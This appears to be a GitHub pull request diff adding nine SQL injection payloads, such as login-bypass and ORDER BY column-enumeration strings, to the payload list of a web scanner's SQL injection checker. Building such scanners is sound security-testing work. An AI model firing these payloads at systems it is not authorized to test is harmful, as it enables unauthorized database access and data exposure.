Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
9 changes: 9 additions & 0 deletions webscanner/scanner/sql_injection_checker.py
Original file line number Diff line number Diff line change
Expand Up @@ -51,6 +51,15 @@
"\" OR SLEEP(5) -- ",
"' OR (SELECT 1 FROM dual WHERE EXISTS(SELECT * FROM users)) -- ",
"' AND (SELECT SUBSTRING(@@version,1,1)) = '5' -- ",
"admin' OR '1'='1'--",
"admin')--",
"' OR ''='",
"' OR '1'='1' /*",
"' OR 1=1 ORDER BY 1--",
"' OR 1=1 ORDER BY 100--",
"' OR 1=1 ORDER BY 1,2,3--",
"' OR 1=1 GROUP BY column_names_here--",
"' OR 1=1 HAVING 1=1--",
]


Expand Down